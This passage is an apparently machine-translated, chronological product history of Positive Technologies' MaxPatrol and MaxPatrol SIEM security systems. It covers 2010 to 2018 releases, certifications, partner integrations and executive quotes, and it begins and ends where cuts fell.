Additionally, each asset is enriched with data from its own MaxPatrol SIEM sensor, designed to analyze network traffic. It detects network nodes in traffic and transmits open port information to MaxPatrol SIEM; New assets can be created based on the data obtained. The expanded amount of information about assets helps the information security service better understand the protected IT infrastructure, its vulnerabilities, and more accurately calculate the possible vectors for the development of attacks, simplifies the investigation of the incident, helps identify the vulnerability used and prevent similar attacks.

Also, the updated version of the system is distinguished by the expanded functionality of the built-in Network Sensor component, designed for comprehensive traffic analysis, including files transmitted over the network. Network Sensor has received its own signature database to detect the exploitation of vulnerabilities and the operation of malicious software. Signatures are written based on investigations conducted by the PT Expert Security Center team, analysis of threats and vulnerabilities relevant to organizations from various fields of business. Thanks to this, the user MaxPatrol SIEM 4.0 is able to detect anomalies, malicious activity on the network and sources of suspicious traffic, and prevent attacks.

To control information security at the strategic and tactical levels, a special PT Security Intelligence Portal module is used. This is a tool for visualizing data, in-depth analysis of information security processes, the work of information security and the means of protection used. PT Security Intelligence Portal contains out-of-the-box scorecards and performance metrics, allowing management to assess how effective the information security measures are and whether there are enough resources to achieve the goals. Information security and IT specialists will help predict possible incidents, prioritize tasks and conduct investigations, Positive Technologies noted.

Finally, MaxPatrol SIEM 4.0 optimized the installation process ― according to the developers, minimized the likelihood of errors and reduced the number of actions required to deploy the system by 60%.

Identify advanced cyberattacks on Active Directory

26 incident detection rules have been added to the MaxPatrol SIEM information security event management system to detect advanced cyber attacks on Microsoft Active Directory, Positive Technologies reported on April 16, 2018. Their use makes it possible to identify attacks at the earliest stages, including already at the intelligence stage. Ultimately, the window of presence of an attacker in the infrastructure can be reduced to several hours, the developers say.

The creation of a special package of rules was the result of the work of the Expert Security Center of Positive Technologies: experts analyzed the full cycle of attacks on Active Directory and identified a chain of information security events and requests in network traffic that indicate the presence of attackers in the infrastructure. Next, a package with anomaly detection algorithms (correlation rules) was developed to automatically analyze events for signs of such attacks and to notify the information security unit using MaxPatrol SIEM. Now information security specialists using the system will be able to identify attacks on Active Directory at the stage of reconnaissance, promotion within the network and remote execution of commands.

File:Aquote1.png
As experienced in incident investigation, Microsoft Active Directory is the main target of attackers during any attack on corporate information systems. Its hacking allows you to gain unlimited control in managing accounts and computers on the local network. Despite the strengthening of proactive security systems, attackers and professional pentesters find new vectors of attacks on Active Directory that are difficult to detect in the IT infrastructure, "said Maxim Filippov, director of business development in Russia at Positive Technologies. - Due to the technology we have implemented, users can transfer expertise to products in real time to identify the actions of an attacker in their infrastructure. Including if they use the latest attack techniques and tools. Now MaxPatrol SIEM users will be able to automatically detect advanced attacks on Microsoft Active Directory.
File:Aquote2.png

2017

PT Security Intelligence Portal Extension Module Release

On November 21, 2017, Positive Technologies announced the release of the MaxPatrol SIEM - Security Intelligence Portal module.

The tool is designed for the work of information security managers and visualization of their activities in a form adapted for top management. The module expands the capabilities of information security management at the strategic, tactical and operational levels.

PT Security Intelligence Portal, based on MaxPatrol SIEM data on assets, events and incidents, allows you to build an information security management process in accordance with the company's business goals. With its help, you can analyze the existing information security processes, the work of protective equipment and information security units in an organization of any scale, it is available and clearly present the results of the analysis to top management.

The tool will help information security managers assess the security of the infrastructure and the sufficiency of protection measures. To get started immediately and get the first results, the PT Security Intelligence Portal includes a ready-made set of performance indicators and metrics for calculating them, assessing the effectiveness of systems, personnel and processes that can be customized based on the needs of the organization.

The MaxPatrol SIEM module is based on the knowledge accumulated during the development of the analytical reporting portal for MaxPatrol 8 - PT Reporting Portal, the experience of the Security Expert Center (PT ESC), the results of cooperation with key clients of Positive Technologies.

PT Security Intelligence Portal is part of the company's comprehensive technology platform.

Integration with Solar Dozor

Companies Solar Security and Positive Technologies announced in October the completion of a project to integrate DLP solutions Solar Dozor and ― MaxPatrol SIEM the system, designed to identify information security incidents in real time. Now Solar Dozor transfers data to MaxPatrol SIEM, thanks to which the security officer receives a complete picture of information security events and incidents in the company, including data on the transfer of confidential information through various channels, from one source.

Compatibility with Dallas Lock 8.0 editions "K" and "C"

Positive Technologies and Confidential announced on August 17 that the results of the tests confirmed the correctness of the joint operation of the system for detecting information security incidents in real time MaxPatrol SIEM with the Dallas Lock 8.0 IPS editions "K" and "C" (including protective modules of NSD, ESD, ME, SOV).

The integration of the two solutions was made possible thanks to the refinement of MaxPatrol SIEM to add a new event source, which is the Dallas Lock 8.0 information security event database. This functionality became available to end customers in the latest product release.

Now users have the opportunity to implement using MaxPatrol SIEM the centralized collection and correlation of information security events generated by the Dallas Lock 8.0 MPS and other security tools installed in the organization.

File:Aquote1.png
Testing Dallas Lock solutions for compatibility with solutions from other SMT manufacturers is an important component of the Information Security Center. Thanks to the integration of the two solutions, end users have received an effective tool for centralized collection and analysis of security events, - said Yegor Kozhemyaka, director of the Information Protection Center "Confidential."
File:Aquote2.png

File:Aquote1.png
We are continuously improving the MaxPatrol SIEM product, including expanding the number of supported event sources for both foreign and Russian developers. Thanks to this, the end user of the system receives a complete picture of the security of the infrastructure at any time and can detect information security incidents occurring in it, regardless of the information protection tools used, "said Alexey Goldbergs, Head of Technology Partners at Positive Technologies.
File:Aquote2.png

Dallas Lock is certified: FSTEC Russia

  • in version 8.0-K - for compliance with the 4th level of control over the absence of EOP, the 5th class of protection against NSD, the 3rd class of protection ME, the 4th class of protection EPS, the 4th class of protection ESD and has a certificate of conformity of the FSTEC of Russia No. 2720 dated 25.09.2012, which is valid until 25.09.2018
  • in version 8.0-S - for compliance with the 2nd level of control over the absence of EOP, the 3rd class of protection against NSD, the 3rd class of protection ME, the 4th class of protection EPS, the 2nd class of protection ESD and has a certificate of conformity of the FSTEC of Russia No. 2945 dated 16.08.2013, which is valid until 16.08.2019

MaxPatrol SIEM is certified by the FSTEC of Russia for compliance with level 4 of NDV absence control and has a certificate of compliance with the FSTEC of Russia No. 3734 dated 12.04.2017, valid until 12.04.2020.

Updated MaxPatrol SIEM will protect against WannaCry and NotPetya class threats

In July, Positive Technologies introduced the next version of MaxPatrol SIEM. The updated product mechanisms quickly detect and localize epidemics such as WannaCry and NotPetya. Users of the system can also create persistent and time-consuming correlation rules, which can detect even long-term APT attacks despite changes in the company's IT infrastructure.

"Over the
past couple of months, hundreds of companies around the world have fallen victim to ransomware viruses: car factories, banks, retail chains, pharmaceutical and shipping companies. We try to respond quickly to such events, so the main changes in the new version of MaxPatrol SIEM are related to the detection and localization of cryptolocker epidemics. Technologies for checking network reachability, flexible work with assets and network interaction events will make it easier to identify any threats of this type. In addition, our experts quickly created the appropriate correlation rules for detecting WannaCry and NotPetya attacks, "said Maxim Filippov, director of business development in Russia at Positive Technologies
.

Recognizing Assets with New Parameters

The new algorithm for identifying hardware and software elements of the IT infrastructure (assets) takes into account dozens of asset parameters and gives them different "weight." As a result, MaxPatrol SIEM recognizes the asset even after changing the IP address, MAC address, hostname, or other parameters, which is important when using a DHCP server and working for NAT. Thus, MaxPatrol SIEM now builds a more accurate IT infrastructure model and allows you to create strong correlation rules.

Localization of outbreak foci

The network reachability check technology implemented in the new version of MaxPatrol SIEM will allow you to quickly understand whether a node or network is available, up to the protocol and port. And if an epidemic of the virus has begun in a large geographically distributed network and options for its spread are known, for example, certain ports, the administrator will be able to quickly localize the outbreak and save information on tens of thousands of computers or make sure that the epidemic of this virus does not threaten the critical infrastructure of the enterprise.

According to the developers, MaxPatrol SIEM will not only present the current routes to the desired asset on the network map, but will also highlight all available alternatives. In turn, this will allow you to quickly detect errors in the configuration of network devices and prevent violations of access policies. In addition, a few seconds are enough to check for the presence of nodes infected with WannaCry or NotPetya in the network due to the new function of grouping network events by several features (for example, by senders and recipients of packets on port 445, with the exception of shared file servers).

Grouping assets by complex rules

MaxPatrol SIEM now allows you to form dynamic asset groups according to rules that include AND, OR, NOT logic, and configure accurate correlation rules on them to detect and respond to information security incidents. For example, you can create a group of WannaCry vulnerable assets by adding three conditions: the presence of vulnerability CVE-2017-0145 and open ports 139 or 445, as well as the absence of antivirus on the node.

Detection of APT by time-stretched correlations

In the updated MaxPatrol SIEM system, you can create tabular lists that enhance the ability to bring Positive Technologies expertise to the product. Information security incidents can now be identified based on complex correlations up to several years long, which is especially important for detecting advanced persistent threats, in which the average "lifetime" of an attacker in an organization is 3 years.

In addition to new capabilities for identifying and analyzing incidents, the system has received multiple improvements in the interface. New widgets have appeared with the ability to view detailed information by double-clicking the mouse, displaying events on the topology of the IT infrastructure, unloading the network map in vector and raster formats.

Certificate of FSTEC of Russia

MaxPatrol SIEM ─ a system designed to manage information security incidents in real time ─ passed certification tests and received a certificate of conformity to the FSTEC of Russia No. 3734 dated April 12, 2017. The obtained certificate confirms that the information security management and security control system complies with the requirements and technical specifications of the FSTEC of Russia for the 4th level of control for the absence of undeclared capabilities and can be used in automated systems, containing confidential information up to and including 1G class, as well as in personal data information systems up to the 1st level of security, state information systems and APCS up to the 1st class.

Spring 2017 Update MaxPatrol SIEM

On April 13, 2017, Positive Technologies announced the release of MaxPatrol SIEM. This version of the product has increased the speed of asset discovery and network topology construction, the pace of processing security events (normalization, aggregation, correlation) has increased by 40%, the company said.

The upgraded system includes mechanisms for comprehensive analysis of network traffic and file activity on computers and servers, collective metrics of significance, which allow you to automatically provide targeted control of critical workstations.


Comprehensive Network Traffic Analysis

With the advent of the Network Sensor component, a comprehensive analysis of network interaction has become available at all levels of the OSI model - from channel (L2) to application (L7). This component allows you to more accurately and quickly identify IT assets and build a network topology, see the current IT infrastructure model in real time. This information can be used in correlation rules to detect a wide range of attacks, detect violations of network access policies, such as the use of an unsafe Telnet protocol, transfer a large amount of data from a client or server, download malicious files, the presence of remote access applications (TeamViewer, etc.), incorrect segmentation of intra-network resources, etc.


File Activity Monitoring

To obtain information about assets that cannot be detected by auditing the network infrastructure, the latest version of the system implements the Endpoint Monitor component - an agent that operates at the Windows driver level and monitors file activity in segments with company-critical information - file servers and workstations.

File:Aquote1.png
MaxPatrol SIEM uses a number of mechanisms to build the most complete picture of the state of the IT infrastructure in dynamics, which allows you to increase the durability of correlation rules and quickly detect attacks. This also applies to the components of Network Sensor and Endpoint Monitor, thanks to which information about each asset is constantly enriched with fresh data on file changes, protocols and applications. The functionality allows you to create more accurate correlation rules and collect maximum infrastructure data at the start-up stage.

Alexey Andreev, Director of Positive Technologies for the development of MaxPatrol SIEM
File:Aquote2.png


Increased focus on key assets

The latest version of MaxPatrol SIEM has a collective (single) asset significance metric that allows you to prioritize incidents according to the importance of the asset and, as a result, reduce the response time to the incident.


Automated reporting

MaxPatrol SIEM supports automatic generation of scheduled reports in common formats (PDF, DOCX, HTML, XLS, CSV, JSON, XML). This gives management and specialists without access to SIEM, but who need to get operational information from the system. The generated report can be automatically sent to administrators by e-mail according to the specified schedule.

This version of MaxPatrol SIEM adds custom widgets, system administrator activity logs, system component monitoring templates, and a number of other add-ons.

2016

Integration with InfoWatch Traffic Monitor Enterprise

On December 8, 2016, Positive Technologies and InfoWatch announced the completion of the integration of InfoWatch Traffic Monitor Enterprise 6.1 technology and MaxPatrol SIEM system.

Partners announced the start of the MaxPatrol SIEM support program for subsequent versions of InfoWatch Traffic Monitor.

As a result of integration, data coming from the InfoWatch Traffic Monitor DLP system became available for processing and analysis in MaxPatrol SIEM. SIEM users have the ability to track the history of the transfer of confidential information through corporate email and various web resources, messaging systems and file sharing tools, and block unauthorized actions of employees.

File:Aquote1.png
The methods of actions of attackers are improving every day, so manufacturers of security tools are forced to constantly expand the functionality of their systems in response to modern threats. The problem of information leakage is no exception. Often, a bundle of class and decision is used to quickly identify such incidents SIEM. DLP Today MaxPatrol SIEM it supports the means of protection of most domestic manufacturers, including companies. We InfoWatch continue to work on adapting MaxPatrol SIEM to work with. In InfoWatch Traffic Monitor particular, we aim to expand the list of supported versions DLP of the system, collect new types of events, simplify this process for the end user and maximize its automation.

Alexey Goldbergs, Head of Technology Partners at Positive Technologies
File:Aquote2.png

File:Aquote1.png
The main task of integrating InfoWatch Traffic Monitor and MaxPatrol SIEM is to protect the business processes of organizations from illegal actions of attackers at an early stage of their planning. Integration allows the company's information security service not only to quickly identify distributed attacks by correlating information from a DLP solution with other security tools, but also to block targeted attacks aimed at stealing confidential information. Minimizing financial, operational and reputational losses of customers is the main driver of the partnership between InfoWatch and Positive Technologies.

Marina Batalova, Product Development Manager of InfoWatch Group of Companies
File:Aquote2.png

MaxPatrol SIEM Limited Edition

On September 20, 2016, Positive Technologies introduced the MaxPatrol SIEM Limited Edition (LE), a fully functional software and hardware complex for detecting real-time information security incidents.

The product is focused on the use of small and medium-scale IT infrastructures.

The product includes a hardware platform designed for storage of data for 15 months. For large amounts of data and long-term storage (up to 5 years), the storage capacity can be increased through the hardware archive storage option.

File:Aquote1.png
The new product is the fastest and most affordable way to implement an enterprise SIEM system. With the support of Positive Technologies and technical innovations in the product, migration from other solutions to MaxPatrol SIEM LE is fast and painless for business processes.

Vladimir Bengin, Head of Sales Support at SIEMPOSITIVE Technologies
File:Aquote2.png

MaxPatrol SIEM LE can be used as a separate complex or to scale the existing MaxPatrol SIEM system - it can be installed in territorial divisions and operate as part of a single system.

File:Aquote1.png
In recent years, there has been a very alarming trend associated with the growing attention of hackers to small and medium-sized companies. On average, three in five cyber attacks target small business infrastructures. This is confirmed by Positive Technologies analysts and other security experts. Attackers are attracted by the relatively low level of security of such enterprises. In Russia, this trend is clearly visible in the financial sector, where instead of mass attacks on users, attackers are increasingly using complex targeted attacks against medium-sized credit institutions.

Maxim Filippov, Business Development Director of Positive Technologies in Russia
File:Aquote2.png

The product has all the capabilities of the full version of MaxPatrol SIEM and has only scalability limitations. The requirements for the SIEM operation command are reduced by automating administration procedures, building a complete model of infrastructure and network topology, using the integrated MaxPatrol platform instead of many heterogeneous information security solutions. MaxPatrol SIEM operates not with separate IP addresses or hostname, but also with higher-level categories - assets and dynamic asset groups. As a result, the rules remain functional even after infrastructure changes, which is a key difference from other SIEM systems.

The MaxPatrol SIEM LE does not have artificial performance limitations, it is completely determined by the characteristics of the equipment.

The product will help ensure compliance with current industry regulatory requirements. In particular, the financial sector − the federal law "On the National Payment System" 161-F3 (Bank of Russia Regulation No. 382-P), the Bank of Russia standard STO BR IBBS 2.5 (clause 6.5.2), and the federal law 152-FZ "On Personal Data." The product is included in the register of domestic software.

MaxPatrol 8.0 is certified for use in the Republic of Belarus

The Operational and Analytical Center under the President of the Republic of Belarus confirmed the compliance of the system with the requirements of technical regulations TR 2013/027/BY (STB 34.101.1-2014, STB 34.101.2-2014 and STB 34.101.3-2014). The certificate of conformity was issued by Axoftbel LLC and is valid until June 12, 2020 inclusive.

The obtained certificate allows you to use MaxPatrol 8.0 at informatization facilities of class A2, B2, V2, A3, B3 and V3, that is, to protect information systems that process or contain open information, data, the distribution and/or provision of which is limited, as well as information protected in accordance with the legislation of the Republic of Belarus.

MaxPatrol SIEM sales in 2015 amounted to 180 million rubles

The volume of sales of MaxPatrol SIEM at the end of the year amounted to about 180 million rubles, in 2016 the company plans to increase it to 400 million, and in 2017 to bring the product to the European market.

"The product is progressing rapidly," said Maxim Filippov, director of business development at Positive Technologies in Russia. - We learned how to carry out pilot projects with high quality, established the process of supporting any sources of the customer (no one has this), formed a world-class development system and understandable plans for the development of the product. 113 specialists of partner companies were trained. Our goal is to match the leaders of the Russian market for classic SIEM systems in 2017. We predict the growth of the Russian market in this segment from 2.2 billion rubles. in 2016 to 3.2 billion in 2018, and set ourselves the task of taking a leading position in this market. "
The creation of a product of this level required Positive Technologies specialists to abandon the concept of cascading development and move to more flexible practices, which made it possible to increase the speed and efficiency of releasing product updates - meeting market requirements, and in some cases ahead of them.
"A product of this level required a transformation of the development process. For us, it was not only an external, but also an internal challenge. If earlier all our products were created by a group of enthusiasts who were partly hackers, partly developers, then when faced with a SIEM-level product, we realized that development should be singled out in a separate direction. Today, MaxPatrol SIEM is created by 80 developers and quality engineers. We switched to organizing micro-commands based on the Two Pizza Team model, which has proven its effectiveness in world-class companies. Such commands easily interact with each other, quickly make decisions and implement changes, radically improving the product from the user interface to backend logic, "comments Alexey Andreev, Director of Development MaxPatrol SIEM
.

Positive Technologies' approach implies the creation of a platform, the key element of which is MaxPatrol SIEM. Built on an activocentric approach, this platform must be manageable, adaptable to the dynamically changing infrastructure of the organization and solve its real problems. In accordance with the unique vision for the development of the SIEM industry and the new era of Threat Intelligence solutions, product development plans for the next three years have been formed, including four key releases annually. So, by the third quarter of 2016, a release will be released in which a cloud mechanism for updating vulnerability data will appear, and by the fall it is planned to introduce an autocorrelation mechanism based on modeling attack vectors. The quick release of updates allows you to quickly make corrections and improvements based on the results of pilot implementations.

In the spring of 2016, 26 were completed and another 25 MaxPatrol SIEM "pilots" are in operation, 15 commercial projects have been implemented. MaxPatrol SIEM is used by the Russian Ministry of Defense and the Ministry of Transport, the energy company Rosseti, the Moscow Department of Information Technology, the Committee for Informatization and Communications of St. Petersburg.

To the register of Russian programs

The system for monitoring information security events MaxPatrol SIEM and the protection screen of the PT Application Firewall application level by order of the Ministry of Telecom and Mass Communications of the Russian Federation were entered in the unified register of Russian programs for electronic computers and databases in early June 2016. In accordance with the decision of the authorized body, since June 14, 2016, the PT Application Firewall system has been included in the software class, which includes enterprise information security tools. MaxPatrol SIEM is also included in the monitoring and management systems class and systems for collecting, storing, processing, analyzing, modeling and visualizing data arrays.

Since May 2016, the unified register of domestic software also includes the XSpider vulnerability scanner (in the class of information security tools) and the flagship solution of Positive Technologies - MaxPatrol 8.0 (in the class of enterprise information security monitoring and management systems).

MaxPatrol SIEM connected to InfoWatch Traffic Monitor Enterprise

In early summer 2016, Positive Technologies announced the connection of InfoWatch Traffic Monitor Enterprise version 4.1 as a source of information security events for the MaxPatrol SIEM system.

Positive Technologies experts have deployed a stand of a data leakage control system with the reproduction of typical information security events, developed rules for converting data received from the DLP system into the MaxPatrol SIEM format. As a result of integration, SIEM users have the ability to track events from a DLP system in a single dashboard. Including the transfer of confidential information through corporate mail, Internet resources, file sharing and messaging systems.

MaxPatrol SIEM also supports the means of protection of most domestic manufacturers: Dr.Web, Kaspersky Lab, Security Code, S-Terra CSP, Smart Line Ink, InfoWatch, InfoTeCS, etc.

MaxPatrol SIEM 2.0 is compatible with the means of protection of Russian manufacturers

On April 29, 2016, Positive Technologies announced the release of the MaxPatrol SIEM 2.0 version of the information security event collection and analysis system.

The version is distinguished by a simplified approach to the formation of correlation rules and expanded capabilities for incident investigation based on retrospective monitoring of the state of all IT infrastructure assets. As a result, the number of false positives of the system when working with large amounts of data decreases. Also in MaxPatrol SIEM 2.0, the knowledge base on supported data sources (including domestic ones) was expanded.

MaxPatrol SIEM 2.0 operates not only with information security events, but also with real infrastructure entities at any time - it accumulates information about the network, its nodes and configurations (including virtual machines), allowing you to build a complete model of the IT infrastructure and see the whole picture of what is happening.

The system allows you to use information about assets in correlation rules (from the list of installed software, access rights to the list of vulnerabilities) and assess the degree of risk of each incident. Thanks to this, the frequency of false positives of the system is significantly reduced, and information security specialists receive a tool for prompt investigation of security incidents with reference to specific observation objects.

The updated system interface provides flexible work with data (including sorting, grouping, filtering, search mechanisms, redesigned in accordance with the urgent needs of an information security specialist) and allows you to generate reports of various complexity that reflect the real state of information security (including out of the box).

In this release, it is possible to create correlation rules, according to which disparate events are combined into incidents, directly from the web interface. As a result, the process of manually creating rules in some cases was reduced to several minutes.

The product has a knowledge base about supported sources (compatible with the equipment of leading foreign vendors, allows you to connect security tools of most domestic manufacturers as sources of events: Dr.Web, Kaspersky Business Space Security, C-Terra SiPp, InfoWatch (InfoWatch), Secret Net, InfoTeCS (Infotecs)) and has more than 100 predefined correlation rules.

MaxPatol SIEM 2.0 is an enterprise-level solution that meets all requirements for stability and performance in high-load enterprise systems.

Technical innovations and the fully open MaxPatol SIEM 2.0 API allow its implementation or transition from other SIEM solutions almost imperceptibly to the business processes of the organization.

MaxPatrol и DeviceLock

On April 12, 2016, Positive Technologies and Smart Line Ink announced the implementation of a combination of the technological capabilities of MaxPatrol and DeviceLock products to protect corporate resources.

As a result of the joint actions of the MaxPatrol partners, SIEM was able to automatically connect DeviceLock DLP Suite as a source of information security events.

File:Aquote1.png
author = Maxim Filippov, Director of Positive Technologies for Business Development in Russia
The number of sources supported is one of the key characteristics of the SIEM system. But the customer is not this figure itself, but confidence that the sources of events will be supported by his IT infrastructure. And for the Russian customer, support for means of protecting information of domestic production is a priority. Responding to these challenges, MaxPatrol SIEM already supports dozens of systems from domestic manufacturers, and we continue to expand their list. The threat of confidential data leakage is always relevant, and many companies are actively using DLP systems - including MaxPatrol SIEM users. Therefore, we began adapting MaxPatrol SIEM to the nuances of DLP systems, the first of which was the Russian software package for detecting and preventing leaks of confidential and critical data DeviceLock DLP Suite, widely used in government agencies, in financial, energy and telecommunications companies.
File:Aquote2.png

The revision of MaxPatrol SIEM was carried out in conjunction with Smart Line Ink. Positive Technologies experts deployed a test bench of the data leakage control system, reproduced external media connection events and decrypted and described events in logs from the DLP system database.

Smart Line specialists gave the necessary explanations about the types and format of events generated by the DLP system, provided the ability to connect to the database. Based on the results of the work, rules were developed for converting data received from the DLP system into the MaxPatrol SIEM format. As a result of the improvement, the information security event monitoring and correlation system provides information collection from the DeviceLock DLP Suite database, including events of joining flash drives, smartphones and other devices to work computers.

File:Aquote1.png
author = Sergey Vakhonin, Solutions Director of Smart Line Ink
Valuable enterprise data can be copied from work computers to flash drives, mobile devices, cloud storage, or transferred to third parties via e-mail and other channels. DeviceLock DLP Suite monitors access to storage and processing devices, monitors user communication channels, and filters the contents of transferred files. Connecting the PT MaxPatrol SIEM system to DeviceLock DLP Suite will allow you to display all the necessary correlations from the DLP system on a single dashboard, which will fundamentally increase the responsiveness of security services to information leakage incidents and allow hot-pursuit investigations.
File:Aquote2.png

SurfPatrol is integrated with Crypto-Pro solutions

In the spring of 2016, Positive Technologies and Crypto-Pro announced the start of cooperation. The result of the collaboration was the integration of the SurfPatrol online service from Positive Technologies, with which you can check the security of the web browser, and the Crypto-Pro solutions designed to form an electronic signature - CryptoPro EDS Browser plug-in, CryptoPro DSS and CryptoPro DSS Lite. Combining these technologies will allow Crypto-Pro customers to reduce the risk of substitution of signed data when forming an electronic signature.

As noted, Crypto-Pro solutions are used to work with electronic document management systems: using an electronic signature, documents are certified on public services websites, client portals, Internet banking systems, purchases are made on electronic trading platforms. Thus, "CryptoPro EDS Browser plug-in" is used to form and verify electronic signatures on web pages. The software and hardware complex "CryptoPro DSS" provides secure storage of user private keys and provides authenticated access to them to form an electronic signature. Its lightweight version of CryptoPro DSS Lite is designed to sign documents of the most common formats on various platforms in a web browser.

However, the use of electronic signatures directly in a web browser entails potential risks: both the browser and its extensions often contain critical vulnerabilities that attackers can use to spoof signed data. The price of such an attack in the event of its successful implementation is serious reputational and financial losses. Therefore, one of the main tasks facing Crypto-Pro and its clients is to control the security of the web browser when forming an electronic signature, the company said.

The integration of the SurfPatrol online service from Positive Technologies into the Crypto-Pro electronic signature tools provides protection against attacks aimed at exploiting web browser vulnerabilities. Now, when a user contacts CryptoPro EDS Browser plug-in, CryptoPro DSS or CryptoPro DSS Lite, SurfPatrol will automatically analyze the operation of the web browser and its extensions and issue a verdict on their security. If vulnerabilities are detected, users will be informed about security threats, and will also receive recommendations for their elimination, Positive Technologies emphasized.

2015

MaxPatrol is ISO 15408 certified

On June 22, 2015, Positive Technologies announced the completion of certification of the MaxPatrol security control and compliance system according to the ISO 15408 standard in Germany.

The international certificate on security requirements was issued by the German Federal Department for Security in the Field of Information Technology (BSI) - an analogue of FSTEC in Russia.

The standard ISO 15408 "Common Criteria for Information Technology Security Evaluation" (abbreviated as Common Criteria or CC) was adopted in 1999 as a unified international standard for certification of information systems according to security requirements. The standard allows you to form security tasks - unified documents with which you can outline the safety requirements of a product, developers can declare the safety properties of their product, security experts - determine whether the product satisfies these statements, and consumers can evaluate whether the product is suitable for their computer systems. Thus, the standard provides conditions in which the process of describing, developing and verifying a product for safety requirements is carried out with the necessary scrupulousness.

The certification procedure provided by ISO 15408 has two important differences from other types of conformity assessment:

  • unlike, for example, certification for compliance with technical specifications, the developer of the certified product is obliged not only to declare the security functions of his solution, but also to justify the sufficiency of these functions to counter threats characteristic of the conditions under which operation is expected.

  • the certificate indicates the level of trust (Evaluation Assurance Level, EAL), which allows the consumer of a certified solution to judge how deeply this solution has been investigated during certification tests.

The MaxPatrol system certificate confirms that the system security functions prevent unauthorized access to scan results, settings, and other important information processed by the system.

The tests were carried out in accordance with the level of trust of the EAL2, which provides for testing the product by the testing laboratory and a detailed study of the design documentation, development and testing processes, and searching for vulnerabilities in the files of the system distribution.

"This is the first successful certification of a software product of a Russian company abroad under the CCRA agreement. I will not hide when we first started this work, we had some concerns that political complications would prevent it from being completed. But they, fortunately, did not materialize, - said Dmitry Kuznetsov, director of methodology and standardization at Positive Technologies. - Comparing the experience of foreign and Russian certification, we did not notice any significant differences in the work of German and Russian testing laboratories. The main difficulty, perhaps, turned out to be the need to develop a set of documentation in a form that is established by the requirements of ISO 15408: the composition and content of documents are radically different from what is prescribed to Russian developers by the usual SPD standards. "

MaxPatrol integrated with C-Terra products

On December 1, 2015, S-Terra CSP and Positive Technologies announced the completion of testing the integration capabilities of the C-Terra Gateway and C-Terra Client products into the PT MaxPatrol SIEM system.

MaxPatrol SIEM users were able to view security events from C-Terra devices along with incidents from third-party products.

Now security systems created on the C-Terra product platform are integrated with the universal security platform from Positive Technologies, the main element of which is MaxPatrol SIEM.

Christopher Gazarov, Technical Director of S-Terra CSP LLC, said:

- Compatibility with Positive Technologies' MaxPatrol SIEM system is an important step towards a user who wants not only to reliably protect his network with C-Terra products, but also to monitor system events in real time. The integration of our products has made managing corporate network information security even more effective.

Sergey Pavlov, Network Technology Director of Positive Technologies, noted:

- Positive Technologies always meets its customers. It is known that full protection of any infrastructure requires support for all information protection tools. S-Terra products are used in many large Russian companies, for example, Russian Post, MMC Norilsk Nickel, SO UES. Support for these products in MaxPatrol SIEM allows you to expand the attack visibility horizon and correlate events at a higher level.

According to the companies, the integration of RT MaxPatrol SIEM and C-Terra Gateway products, S-Terra Client provides the ability to identify information security incidents, investigate incidents and identify intruders.

2014

Integration with IBM Security QRadar SIEM

On July 7, 2014, Positive Technologies announced the integration of the MaxPatrol security and compliance control system with the IBM Security QRadar SIEM solution, designed to manage information security events and incidents.

Compatibility of these products will help facilitate the creation of an information security management system.

The developers reported correlation of data coming from network devices, security systems, servers, endpoints, applications and vulnerability scanners with the IBM Security QRadar SIEM application, then notifies administrators of incidents and helps security and IT make decisions.

MaxPatrol combines mechanisms for system checks, penetration testing, compliance control, combined with support for network equipment analysis, operating systems, DBMS, application and ERP systems and web applications. The system allows you to form consistent corporate standards, automate inventory processes, control changes, evaluate IT and information security processes using key performance indicators.

Information about vulnerabilities and compliance with standards collected by MaxPatrol can be automatically transmitted to QRadar, expanding the capabilities of this SIEM.

Positive Technologies receives SAP certification

The MaxPatrol Security and Compliance Monitoring System, developed by Positive Technologies, was certified by SAP, a developer of ERP systems and business applications, and received the status of SAP Certified Integration with SAP NetWeaver.

The certificate confirms that MaxPatrol works correctly with SAP NetWeaver (versions 7.0 and later) and complies with SAP integration standards. The techniques and methods of obtaining data that are used in MaxPatrol are checked and fully approved by the specialists of the German company, and Positive Technologies is included in the number of certified partners of SAP AG.

The collaboration between Positive Technologies and SAP has been going on for several years. Positive Technologies experts conduct specialized penetration tests and security audits of ERP systems and help eliminate identified vulnerabilities. All knowledge gained during such work and related checks are included in the MaxPatrol knowledge base, and some of the security flaws are detected by heuristic mechanisms of the system.

Back in 2009, one of the first in its class, MaxPatrol received mechanisms for identifying security flaws and checking configurations in accordance with ISACA and SAP Security Guides recommendations. Currently, MaxPatrol is used by more than 1000 companies around the world, and the largest SAP installations protected by Positive Technologies products have more than 700 copies of the system and provide interaction for more than 400 thousand users.

MaxPatrol capabilities are not limited to checking basic SAP components: new enhancements allow you to control the security of SAP HCM modules (Human Capital Management), SAP MM (Material Management), SAP SRM (Supplier Relationship Management) and SAP ERP (Enterprise Resource Planning) and control the security of business-critical applications at all levels, from network infrastructure to application elements.

In 2013, Positive Technologies released Application Inspector and Application Firewall, new products that provide source code analysis for proprietary applications and proactively protect critical applications from computer attacks and fraud. Both products are SAP specific: PT AI supports application analysis in SAP ABAP and SAP Java, and PT AF contains specialized modules for blocking zero-day attacks directed at SAP Portal.

2013

MaxPatrol is certified by Center for Internet Security

Positive Technologies announced in the spring of 2013 that the MaxPatrol Security and Compliance Control System received a CIS Security Software Certification for CIS Security Benchmarks compliance certificate from Center for Internet Security, a non-profit organization that plays a leading role in standardization in the field of information security in the United States. Obtaining this certificate means that the implementation of Compliance mode inMaxPatrol meets the requirements of CIS for automated configuration monitoring and security analysis systems. Currently, MaxPatrol is supplied with checks to more than 150 standards for a wide range of different systems, from network equipment to APCS, SAP- and ERP systems, with about half of the standards used being CIS standards.

It is the Security Benchmarks division that develops information security standards and recommendations based on a consensus on the best practices, which is developed within the IT community by numerous information security experts. These recommendations help millions of companies around the world adequately assess the degree of security of their information resources and obtain the most up-to-date information about the secure configuration of various systems. Positive Technologies experts are actively involved in the development of security requirements for CIS standards.

2010

In July 2010, the development company announced that it had developed a security and compliance analysis module for operating system HP-UX, systems and applications based on it. The module is included in the standard delivery of the MaxPatrol security and compliance system.

The use of the module reduces the cost of maintaining HP-UX systems in a secure state, the cost of ensuring compliance with the requirements of industry, state and international standards, such as the Federal Law "On Personal Data," PCI DSS, SOX, ISO In the current implementation, the MaxPatrol system allows you to detect and control the elimination of more than 200 errors related to the management of updates and settings of the HP-UX system. Compliance mode controls about 100 key OS and application configuration parameters related to meeting standards requirements.

The verification system was designed using the HP Partner Virtualization Program (HP PVP) environment provided by HP.

The functionality of MaxPatrol allows you to ensure a continuous technical audit of the security of the entire information system and its individual components. The main advantages of the MaxPatrol solution are:

  • proactive protection of corporate resources using automatic information security monitoring;
